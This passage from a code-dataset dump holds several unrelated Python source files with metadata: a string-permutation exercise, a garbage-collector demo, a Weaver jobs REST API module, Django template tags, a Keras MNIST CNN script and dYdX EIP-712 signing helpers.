In case of multiple\npossible answers, find the lexicographically smallest one among them.\n'''\ninputCases = int(input())\ninputCaseList = [input() for x in range(inputCases)]\n\"\"\"\ndef getOrdList(string):\n '''gets the lexicological value of each character in the string'''\n ordList = sorted([x for x in map(ord, string)])\n return ordList\nassert getOrdList('hello') == [101, 104, 108, 108, 111]\n\n# 5, 4, 6, 7, 5, 2, 2, 1, 0\n\"\"\"\n\n\n# NEED TO REDO THIS PROBLEM AND TAKE OUT ORDS, FIND OUT WHY ORDS DIDNT WORK, THEY MAY HAVE BEEN BACKWARDS\ndef getNonIncreasingSuffix(ordList):\n ordList = ordList[::-1]\n nonIncreasingSuffixList = [ordList[0]]\n i = 1\n while ordList[i] >= ordList[i-1]:\n nonIncreasingSuffixList.append(ordList[i])\n i += 1\n return nonIncreasingSuffixList[::-1]\nassert getNonIncreasingSuffix([5, 4, 6, 7, 5, 2, 2, 1, 0]) == [7, 5, 2, 2, 1, 0]\n\ndef getNextOrder(ordList, suffix):\n '''Using ridiculously long variable names, swaps the rightmost index that is\n one greater than the index that is one index before the suffix, with the index\n that is one index before the suffix'''\n firstSuffixIndex = -(len(suffix))\n oneBeforeSuffixIndex = firstSuffixIndex - 1\n ####### largest smallest, not +1\n i = len(ordList) - 1\n while i > 0:\n if ordList[i] > ordList[oneBeforeSuffixIndex]:\n oneGreaterIndex = i\n i = 0\n else:\n i -= 1\n ordList[oneBeforeSuffixIndex], ordList[oneGreaterIndex] = ordList[oneGreaterIndex], ordList[oneBeforeSuffixIndex]\n ordList[firstSuffixIndex:] = ordList[firstSuffixIndex:][::-1]\n return ordList\nassert getNextOrder([5, 4, 6, 7, 5, 2, 2, 1, 0], [7, 5, 2, 2, 1, 0]) == [5, 4, 7, 0, 1, 2, 2, 5, 6]\n\ndef printCases(cases, caseList):\n for i in range(cases):\n ordList = (list(caseList[i]))\n if sorted(ordList, reverse = True) == ordList:\n print('no answer')\n else:\n nonIncreasingSuffixList = getNonIncreasingSuffix(ordList)\n newOrdList = getNextOrder(ordList, nonIncreasingSuffixList)\n print(''.join(newOrdList))\n\nprintCases(inputCases, inputCaseList)\n","sub_path":"Python/Algorithms/Strings/#9 Greater is Better.py","file_name":"#9 Greater is Better.py","file_ext":"py","file_size_in_byte":2305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"609477420","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport gc\nimport pprint\n\n\nclass Graph(object):\n\n def __init__(self, name):\n self.name = name\n self.next = None\n\n def set_next(self, next):\n print(\"Linking nodes {}.next = {}\".format(self, next))\n self.next = next\n\n def __repr__(self):\n return \"{}({})\".format(self.__class__.__name__, self.name)\n\n def __del__(self):\n print(\"{}.__del__()\".format(self))\n\n\ndef main():\n one = Graph(\"one\")\n two = Graph(\"two\")\n three = Graph(\"three\")\n one.set_next(two)\n two.set_next(three)\n three.set_next(one)\n\n print(\"\\nCollecting...\")\n n = gc.collect()\n print(\"Unreachable objects:\", n)\n print(\"Remaining Garbage:\", end=' ')\n pprint.pprint(gc.garbage)\n\n references_to_ignore = [locals(), globals(), gc.garbage]\n\n def find_referring_graphs(obj):\n print(\"Looking for references to {!r}\".format(obj))\n referers = (r for r in gc.get_referrers(obj)\n if r not in references_to_ignore)\n for ref in referers:\n if isinstance(ref, Graph):\n yield ref\n elif isinstance(ref, dict):\n for parent in find_referring_graphs(ref):\n yield parent\n\n print(\"\\nClearing referrers:\")\n for obj in [one, two, three]:\n for ref in find_referring_graphs(obj):\n print(\"Found 
referrer:\", ref)\n ref.set_next(None)\n del ref\n del obj\n\n print(\"\\nClearing gc.garbage:\")\n del gc.garbage[:]\n\n print(\"\\nCollecting...\")\n n = gc.collect()\n print(\"Unreachable objects:\", n)\n print(\"Remaining Garbage:\", end=' ')\n pprint.pprint(gc.garbage)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"builtin/009.gc/gc_get_referrers.py","file_name":"gc_get_referrers.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"365146183","text":"from typing import TYPE_CHECKING\n\nfrom celery.utils.log import get_task_logger\nfrom pyramid.httpexceptions import HTTPBadRequest, HTTPNotFound, HTTPOk, HTTPPermanentRedirect, HTTPUnauthorized\nfrom pyramid.request import Request\nfrom pyramid.settings import asbool\nfrom pyramid_celery import celery_app as app\n\nfrom notify import encrypt_email\nfrom weaver import sort, status\nfrom weaver.database import get_db\nfrom weaver.datatype import Job\nfrom weaver.exceptions import (\n InvalidIdentifierValue,\n JobNotFound,\n ProcessNotAccessible,\n ProcessNotFound,\n ServiceNotAccessible,\n ServiceNotFound,\n log_unhandled_exceptions\n)\nfrom weaver.formats import CONTENT_TYPE_TEXT_PLAIN, OUTPUT_FORMAT_JSON, get_format\nfrom weaver.owsexceptions import OWSNotFound\nfrom weaver.processes.convert import any2wps_literal_datatype\nfrom weaver.store.base import StoreJobs, StoreProcesses, StoreServices\nfrom weaver.utils import get_any_id, get_any_value, get_settings\nfrom weaver.visibility import VISIBILITY_PUBLIC\nfrom weaver.wps.utils import get_wps_output_url\nfrom weaver.wps_restapi import swagger_definitions as sd\n\nif TYPE_CHECKING:\n from typing import List, Optional, Tuple, Union\n from pyramid.httpexceptions import HTTPException\n from weaver.typedefs import AnySettingsContainer, JSON\n\nLOGGER = get_task_logger(__name__)\n\n\ndef get_job(request):\n # type: (Request) -> Job\n \"\"\"\n Obtain a job from request parameters.\n\n :returns: Job information if found.\n :raise HTTPNotFound: with JSON body details on missing/non-matching job, process, provider IDs.\n \"\"\"\n job_id = request.matchdict.get(\"job_id\")\n store = get_db(request).get_store(StoreJobs)\n try:\n job = store.fetch_by_id(job_id)\n except JobNotFound:\n raise OWSNotFound(code=\"NoSuchJob\", locator=\"JobID\", description=\"Could not find job with specified 'job_id'.\")\n\n provider_id = request.matchdict.get(\"provider_id\", job.service)\n process_id = request.matchdict.get(\"process_id\", job.process)\n\n if job.service != provider_id:\n raise OWSNotFound(\n code=\"NoSuchProvider\",\n locator=\"provider\",\n description=\"Could not find job corresponding to specified 'provider_id'.\"\n )\n if job.process != process_id:\n raise OWSNotFound(\n code=\"NoSuchProcess\",\n locator=\"process\",\n description=\"Could not find job corresponding to specified 'process_id'.\"\n )\n return job\n\n\ndef get_results(job, container, value_key=None, ogc_api=False):\n # type: (Job, AnySettingsContainer, Optional[str], bool) -> Union[List[JSON], JSON]\n \"\"\"\n Obtains the job results with extended full WPS output URL as applicable and according to configuration settings.\n\n :param job: job from which to retrieve results.\n :param container: any container giving access to instance settings (to resolve reference output location).\n :param value_key:\n If not specified, the returned values will have the appropriate ``data``/``href`` key according to the content.\n Otherwise, all 
values will have the specified key.\n :param ogc_api:\n If ``True``, formats the results using the ``OGC-API - Processes`` format.\n :returns: list of all outputs each with minimally an ID and value under the requested key.\n \"\"\"\n wps_url = get_wps_output_url(container)\n if not wps_url.endswith(\"/\"):\n wps_url = wps_url + \"/\"\n outputs = {} if ogc_api else []\n fmt_key = \"mediaType\" if ogc_api else \"mimeType\"\n for result in job.results:\n rtype = \"data\" if any(k in result for k in [\"data\", \"value\"]) else \"href\"\n value = get_any_value(result)\n out_id = get_any_id(result)\n out_key = rtype\n if rtype == \"href\":\n # fix paths relative to instance endpoint, but leave explicit links as is (eg: S3 bucket, remote HTTP, etc.)\n if value.startswith(\"/\"):\n value = wps_url + str(value).lstrip(\"/\")\n elif ogc_api:\n out_key = \"value\"\n elif value_key:\n out_key = value_key\n output = {out_key: value}\n if rtype == \"href\": # required for the rest to be there, other fields optional\n if \"mimeType\" not in result:\n result[\"mimeType\"] = get_format(value, default=CONTENT_TYPE_TEXT_PLAIN).mime_type\n output[\"format\"] = {fmt_key: result[\"mimeType\"]}\n for field in [\"encoding\", \"schema\"]:\n if field in result:\n output[\"format\"][field] = result[field]\n elif rtype != \"href\":\n # literal data\n # FIXME: BoundingBox not implemented (https://github.com/crim-ca/weaver/issues/51)\n dtype = result.get(\"dataType\", any2wps_literal_datatype(value, is_value=True) or \"string\")\n if ogc_api:\n output[\"dataType\"] = {\"name\": dtype}\n else:\n output[\"dataType\"] = dtype\n\n if ogc_api:\n if out_id in outputs:\n output_list = outputs[out_id]\n if not isinstance(output_list, list):\n output_list = [output_list]\n output_list.append(output)\n outputs[out_id] = output_list\n else:\n outputs[out_id] = output\n else:\n # if ordered insert supported by python version, insert ID first\n output = dict([(\"id\", out_id)] + list(output.items())) # noqa\n outputs.append(output)\n return outputs\n\n\ndef validate_service_process(request):\n # type: (Request) -> Tuple[Optional[str], Optional[str]]\n \"\"\"\n Verifies that service or process specified by path or query will raise the appropriate error if applicable.\n \"\"\"\n service_name = request.matchdict.get(\"provider_id\", None) or request.params.get(\"service\", None)\n process_name = request.matchdict.get(\"process_id\", None) or request.params.get(\"process\", None)\n item_test = None\n item_type = None\n\n try:\n service = None\n if service_name:\n item_type = \"Service\"\n item_test = service_name\n store = get_db(request).get_store(StoreServices)\n service = store.fetch_by_name(service_name, visibility=VISIBILITY_PUBLIC)\n if process_name:\n item_type = \"Process\"\n item_test = process_name\n # local process\n if not service:\n store = get_db(request).get_store(StoreProcesses)\n store.fetch_by_id(process_name, visibility=VISIBILITY_PUBLIC)\n # remote process\n else:\n from weaver.wps_restapi.processes.processes import list_remote_processes\n processes = list_remote_processes(service, request)\n if process_name not in [p.id for p in processes]:\n raise ProcessNotFound\n except (ServiceNotFound, ProcessNotFound):\n raise HTTPNotFound(json={\n \"code\": \"NoSuch{}\".format(item_type),\n \"description\": \"{} of id '{}' cannot be found.\".format(item_type, item_test)\n })\n except (ServiceNotAccessible, ProcessNotAccessible):\n raise HTTPUnauthorized(json={\n \"code\": \"Unauthorized{}\".format(item_type),\n 
\"description\": \"{} of id '{}' is not accessible.\".format(item_type, item_test)\n })\n except InvalidIdentifierValue as ex:\n raise HTTPBadRequest(json={\n \"code\": InvalidIdentifierValue.__name__,\n \"description\": str(ex)\n })\n\n return service_name, process_name\n\n\n@sd.process_jobs_service.get(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProcessJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@sd.provider_jobs_service.get(tags=[sd.TAG_JOBS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProviderJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@sd.jobs_service.get(tags=[sd.TAG_JOBS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetJobsEndpoint(), response_schemas=sd.get_all_jobs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_queried_jobs(request):\n \"\"\"\n Retrieve the list of jobs which can be filtered, sorted, paged and categorized using query parameters.\n \"\"\"\n settings = get_settings(request)\n service, process = validate_service_process(request)\n detail = asbool(request.params.get(\"detail\", False))\n page = request.params.get(\"page\", \"0\")\n page = int(page) if str.isnumeric(page) else 0\n limit = request.params.get(\"limit\", \"10\")\n limit = int(limit) if str.isnumeric(limit) else 10\n email = request.params.get(\"notification_email\", None)\n filters = {\n \"page\": page,\n \"limit\": limit,\n # split by comma and filter empty stings\n \"tags\": list(filter(lambda s: s, request.params.get(\"tags\", \"\").split(\",\"))),\n \"access\": request.params.get(\"access\", None),\n \"status\": request.params.get(\"status\", None),\n \"sort\": request.params.get(\"sort\", sort.SORT_CREATED),\n \"notification_email\": encrypt_email(email, settings) if email else None,\n # service and process can be specified by query (short route) or by path (full route)\n \"process\": process,\n \"service\": service,\n }\n groups = request.params.get(\"groups\", \"\")\n groups = groups.split(\",\") if groups else None\n store = get_db(request).get_store(StoreJobs)\n items, total = store.find_jobs(request=request, group_by=groups, **filters)\n body = {\"total\": total}\n\n def _job_list(jobs):\n return [j.json(settings) if detail else j.id for j in jobs]\n\n if groups:\n for grouped_jobs in items:\n grouped_jobs[\"jobs\"] = _job_list(grouped_jobs[\"jobs\"])\n body.update({\"groups\": items})\n else:\n body.update({\"jobs\": _job_list(items), \"page\": page, \"limit\": limit})\n body = sd.GetQueriedJobsSchema().deserialize(body)\n return HTTPOk(json=body)\n\n\n@sd.provider_job_service.get(tags=[sd.TAG_JOBS, sd.TAG_STATUS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderJobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@sd.job_service.get(tags=[sd.TAG_JOBS, sd.TAG_STATUS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@sd.process_job_service.get(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS, sd.TAG_STATUS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.GetProcessJobEndpoint(), response_schemas=sd.get_single_job_status_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_status(request):\n \"\"\"\n Retrieve the status of a job.\n \"\"\"\n job = get_job(request)\n job_status = job.json(request, self_link=\"status\")\n return 
HTTPOk(json=job_status)\n\n\n@sd.provider_job_service.delete(tags=[sd.TAG_JOBS, sd.TAG_DISMISS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderJobEndpoint(), response_schemas=sd.delete_job_responses)\n@sd.job_service.delete(tags=[sd.TAG_JOBS, sd.TAG_DISMISS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobEndpoint(), response_schemas=sd.delete_job_responses)\n@sd.process_job_service.delete(tags=[sd.TAG_PROCESSES, sd.TAG_JOBS, sd.TAG_DISMISS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.DeleteProcessJobEndpoint(), response_schemas=sd.delete_job_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef cancel_job(request):\n \"\"\"\n Dismiss a job.\n\n Note: Will only stop tracking this particular process (WPS 1.0 doesn't allow to stop a process)\n \"\"\"\n job = get_job(request)\n app.control.revoke(job.task_id, terminate=True)\n store = get_db(request).get_store(StoreJobs)\n job.status_message = \"Job dismissed.\"\n job.status = status.map_status(status.STATUS_DISMISSED)\n store.update_job(job)\n\n return HTTPOk(json={\n \"jobID\": job.id,\n \"status\": job.status,\n \"message\": job.status_message,\n \"percentCompleted\": job.progress,\n })\n\n\n@sd.provider_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@sd.process_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@sd.job_inputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobInputsEndpoint(), response_schemas=sd.get_job_inputs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_inputs(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the inputs of a job.\n \"\"\"\n job = get_job(request)\n inputs = dict(inputs=[dict(id=get_any_id(_input), value=get_any_value(_input)) for _input in job.inputs])\n inputs.update(job.links(request, self_link=\"inputs\"))\n inputs = sd.JobInputsSchema().deserialize(inputs)\n return HTTPOk(json=inputs)\n\n\n@sd.provider_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@sd.process_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@sd.job_outputs_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobOutputsEndpoint(), response_schemas=sd.get_job_outputs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_outputs(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the outputs of a job.\n \"\"\"\n job = get_job(request)\n outputs = {\"outputs\": get_results(job, request)}\n outputs.update(job.links(request, self_link=\"outputs\"))\n outputs = sd.JobOutputsSchema().deserialize(outputs)\n return HTTPOk(json=outputs)\n\n\n@sd.provider_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderResultsEndpoint(), 
response_schemas=sd.get_job_results_responses)\n@sd.process_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessResultsEndpoint(), response_schemas=sd.get_job_results_responses)\n@sd.job_results_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobResultsEndpoint(), response_schemas=sd.get_job_results_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_results(request):\n # type: (Request) -> HTTPException\n \"\"\"\n Retrieve the results of a job.\n \"\"\"\n job = get_job(request)\n job_status = status.map_status(job.status)\n if job_status in status.JOB_STATUS_CATEGORIES[status.STATUS_CATEGORY_RUNNING]:\n raise HTTPNotFound(json={\n \"code\": \"ResultsNotReady\",\n \"description\": \"Job status is '{}'. Results are not yet available.\".format(job_status)\n })\n results = get_results(job, request, value_key=\"value\", ogc_api=True)\n results = sd.Result().deserialize(results)\n return HTTPOk(json=results)\n\n\n@sd.provider_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS, sd.TAG_PROVIDERS],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProviderExceptionsEndpoint(),\n response_schemas=sd.get_exceptions_responses)\n@sd.job_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobExceptionsEndpoint(), response_schemas=sd.get_exceptions_responses)\n@sd.process_exceptions_service.get(tags=[sd.TAG_JOBS, sd.TAG_EXCEPTIONS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessExceptionsEndpoint(), response_schemas=sd.get_exceptions_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_exceptions(request):\n \"\"\"\n Retrieve the exceptions of a job.\n \"\"\"\n job = get_job(request)\n exceptions = sd.JobExceptionsSchema().deserialize(job.exceptions)\n return HTTPOk(json=exceptions)\n\n\n@sd.provider_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS, sd.TAG_PROVIDERS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProviderLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@sd.job_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.JobLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@sd.process_logs_service.get(tags=[sd.TAG_JOBS, sd.TAG_LOGS, sd.TAG_PROCESSES], renderer=OUTPUT_FORMAT_JSON,\n schema=sd.ProcessLogsEndpoint(), response_schemas=sd.get_logs_responses)\n@log_unhandled_exceptions(logger=LOGGER, message=sd.InternalServerErrorResponseSchema.description)\ndef get_job_logs(request):\n \"\"\"\n Retrieve the logs of a job.\n \"\"\"\n job = get_job(request)\n logs = sd.JobLogsSchema().deserialize(job.logs)\n return HTTPOk(json=logs)\n\n\n@sd.provider_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROVIDERS, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProviderResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@sd.process_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_PROCESSES, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.ProcessResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@sd.job_result_service.get(tags=[sd.TAG_JOBS, sd.TAG_RESULTS, sd.TAG_DEPRECATED],\n renderer=OUTPUT_FORMAT_JSON, schema=sd.JobResultEndpoint(),\n response_schemas=sd.get_result_redirect_responses)\n@log_unhandled_exceptions(logger=LOGGER, 
message=sd.InternalServerErrorResponseSchema.description)\ndef redirect_job_result(request):\n \"\"\"\n Deprecated job result endpoint that is now returned by corresponding outputs path with added links.\n \"\"\"\n location = request.url.rsplit(\"/\", 1)[0] + \"/outputs\"\n LOGGER.warning(\"Deprecated route redirection [%s] -> [%s]\", request.url, location)\n return HTTPPermanentRedirect(comment=\"deprecated\", location=location)\n","sub_path":"weaver/wps_restapi/jobs/jobs.py","file_name":"jobs.py","file_ext":"py","file_size_in_byte":19227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"386272402","text":"from django import template\nfrom django.template import Node, NodeList, Template, Context, Variable\nfrom django.template.defaultfilters import stringfilter\nfrom django.utils.html import conditional_escape\nfrom django.utils.safestring import mark_safe\nfrom django.utils.encoding import force_unicode\nfrom django.utils.functional import allow_lazy\nimport types\n\nregister = template.Library()\n\n\n@register.filter\ndef relative(value, arg=None):\n "Returns a string representing the time relative to the present"\n from library.relative_time import relative_time\n if not value:\n return u''\n try:\n if arg:\n return relative_time(value,arg)\n return relative_time(value)\n except (ValueError, TypeError):\n return u''\nrelative.is_safe = False\n\n\n@register.filter\n@stringfilter\ndef nl2br(value, autoescape=None):\n "Replaces all newline characters with an HTML line break"\n if autoescape:\n value=conditional_escape(value)\n \n return mark_safe(value.replace('\n', '
<br />\n'))\nnl2br.needs_autoescape = True\n\n\ndef truncate_chars(s, num):\n \"\"\"\n Template filter to truncate a string to at most num characters respecting word\n boundaries.\n \"\"\"\n s = force_unicode(s)\n length = int(num)\n if len(s) > length:\n length = length - 3\n if s[length-1] == ' ' or s[length] == ' ':\n s = s[:length].strip()\n else:\n words = s[:length].split()\n if len(words) > 1:\n del words[-1]\n s = u' '.join(words)\n s += '...'\n return s\ntruncate_chars = allow_lazy(truncate_chars, unicode)\n\n@register.filter\n@stringfilter\ndef truncatechars(value, arg):\n \"\"\"\n Truncates a string after a certain number of characters, but respects word boundaries.\n \n Argument: Number of characters to truncate after.\n \"\"\"\n try:\n length = int(arg)\n except ValueError: # If the argument is not a valid integer.\n return value # Fail silently.\n return truncate_chars(value, length)\ntruncatechars.is_safe = True\n\nclass PreserveGetVarNode(Node):\n def __init__(self, new_keys):\n self.new_keys = new_keys\n \n def render(self, context):\n get_string = '?'\n\n get_dict = {}\n for k in context['request'].GET:\n get_dict[k] = context['request'].GET[k]\n \n for k in self.new_keys:\n v = self.new_keys[k]\n if (v[0] == \"'\") and (v[-1] == \"'\"):\n v = v[1:-1]\n elif (type(v) == types.IntType):\n v= str(v)\n else:\n v = str(Variable(v).resolve(context))\n get_dict[k] = v\n\n get_list = []\n for k in get_dict:\n get_list.append(k + '=' + get_dict[k])\n\n get_string = '?' + ('&'.join(get_list))\n\n return get_string\n \n \n@register.tag()\ndef preserve_get_vars(parser, token):\n \"\"\"\n Usage: {% preserve_get_vars key1=arg1 key2=arg2 ... %}\n \"\"\"\n bits = token.split_contents()[1:]\n new_keys = {}\n for b in bits:\n (k,v) = b.split('=')\n new_keys[k] = v\n return PreserveGetVarNode(new_keys)\n","sub_path":"discussion/templatetags/sfc_tags.py","file_name":"sfc_tags.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"642466586","text":"import os\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import mnist\nfrom tensorflow.keras.utils import to_categorical\nfrom tensorflow.keras.layers import *\nfrom tensorflow.keras.activations import *\nfrom tensorflow.keras.models import *\nfrom tensorflow.keras.optimizers import *\nfrom tensorflow.keras.initializers import *\nfrom tensorflow.keras.callbacks import *\n \nfrom plotting import *\n\n# Save Path\ndir_path = os.path.abspath(\"C:/Users/jan/Dropbox/_Programmieren/Udemy Tensorflow Kurs\")\nlog_dir = os.path.abspath(\"C:/Users/Jan/Dropbox/_Programmieren/Udemy Tensorflow Kurs/logs/mnist\")\n\n(x_train, y_train), (x_test, y_test) = mnist.load_data() #28x28x1\nwidth = 28\nheight = 28\ndepth = 1\nnum_classes = 10\ntrain_size, test_size = x_train.shape[0], x_test.shape[0]\nepochs = 1\n\nx_train = x_train.reshape(train_size, width, height, depth)\nx_test = x_test.reshape(test_size, width, height, depth)\ny_train = to_categorical(y_train, num_classes=num_classes)\ny_test = to_categorical(y_test, num_classes=num_classes)\n\n# Define the DNN\ninput_img = Input(shape=(width, height, depth))\n\nx = Conv2D(filters=16, kernel_size=3, padding='same')(input_img)\nx = Activation(\"relu\")(x)\nx = Conv2D(filters=32, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = MaxPool2D()(x)\n\nx = Conv2D(filters=32, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = 
Conv2D(filters=64, kernel_size=3, padding='same')(x)\nx = Activation(\"relu\")(x)\nx = MaxPool2D()(x)\n\nx = Flatten()(x)\n\nx = Dense(64)(x)\nx = Activation(\"relu\")(x)\nx = Dense(num_classes)(x)\noutput_pred = Activation(\"softmax\")(x)\n\nmodel = Model(inputs=[input_img], outputs=[output_pred])\n\nmodel.summary()\n\n# Train the DNN\nlr = 5e-4\noptimizer = RMSprop(lr=lr)\n\nmodel.compile(\n loss=\"categorical_crossentropy\",\n optimizer=optimizer,\n metrics=[\"accuracy\"])\n\ntb = TensorBoard(log_dir=log_dir, \n histogram_freq=0)\n\nmodel.fit(\n x=x_train,\n y=y_train,\n verbose=1,\n batch_size=64,\n epochs=epochs,\n validation_data=[x_test, y_test],\n callbacks=[tb])\n\n# Test the DNN\nscore = model.evaluate(x_test, y_test, verbose=0)\nprint(\"Score: \", score)","sub_path":"content/Udemy Tensorflow Kurs/Chapter7_CNN/Chapter7_2_CNN_MNIST/mnistCnnModelFinal.py","file_name":"mnistCnnModelFinal.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"537388957","text":"import datetime\n\nimport dateparser as dp\nfrom web3 import Web3\n\nfrom dydx3 import constants\nfrom dydx3.eth_signing import util\n\nDOMAIN = 'dYdX'\nVERSION = '1.0'\nNETWORK_ID = 1\nEIP712_DOMAIN_STRING_NO_CONTRACT = (\n 'EIP712Domain(' +\n 'string name,' +\n 'string version,' +\n 'uint256 chainId' +\n ')'\n)\nEIP712_OFF_CHAIN_ACTION_STRUCT_STRING = (\n 'dYdX(' +\n 'string action,' +\n 'string expiration' +\n ')'\n)\n\n\ndef get_domain_hash():\n return Web3.solidityKeccak(\n [\n 'bytes32',\n 'bytes32',\n 'bytes32',\n 'uint256',\n ],\n [\n util.hash_string(EIP712_DOMAIN_STRING_NO_CONTRACT),\n util.hash_string(DOMAIN),\n util.hash_string(VERSION),\n NETWORK_ID,\n ],\n )\n\n\ndef sign_off_chain_action(\n signer,\n signer_address,\n action,\n expiration=None,\n):\n message_hash = get_off_chain_action_hash(action, expiration)\n raw_signature = signer.sign(message_hash, signer_address)\n return util.create_typed_signature(\n raw_signature,\n constants.SIGNATURE_TYPE_DECIMAL,\n )\n\n\ndef off_chain_action_signature_is_valid(\n typed_signature,\n expected_signer_address,\n action,\n expiration=None\n):\n message_hash = get_off_chain_action_hash(action, expiration)\n signer = util.ec_recover_typed_signature(\n message_hash,\n typed_signature,\n )\n return (\n util.addresses_are_equal(signer, expected_signer_address)\n and (\n # utcnow() yields a naive UTC datetime, comparable with the\n # naive result of dp.parse above (datetime.now() does not\n # accept a timezone string)\n dp.parse(\n expiration,\n settings={'TIMEZONE': 'UTC'},\n ) > datetime.datetime.utcnow() if expiration else True\n )\n )\n\n\ndef get_off_chain_action_hash(\n action,\n expiration=None,\n):\n data = [\n [\n 'bytes32',\n 'bytes32',\n ],\n [\n util.hash_string(EIP712_OFF_CHAIN_ACTION_STRUCT_STRING),\n util.hash_string(action),\n ],\n ]\n if expiration:\n data[0].append('bytes32')\n data[1].append(\n util.hash_string(\n str(dp.parse(expiration, settings={'TIMEZONE': 'UTC'})),\n ),\n )\n struct_hash = Web3.solidityKeccak(data[0], data[1])\n return get_eip712_hash(struct_hash)\n\n\ndef get_eip712_hash(struct_hash):\n return Web3.solidityKeccak(\n [\n 'bytes2',\n 'bytes32',\n 'bytes32',\n ],\n [\n '0x1901',\n get_domain_hash(),\n struct_hash,\n ]\n )\n","sub_path":"dydx3/eth_signing/off_chain_action.py","file_name":"off_chain_action.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
{"seq_id":"444480163","text":"from django.db import models\nfrom model_utils.models import TimeStampedModel\n\n\nclass Home(TimeStampedModel):\n title = 
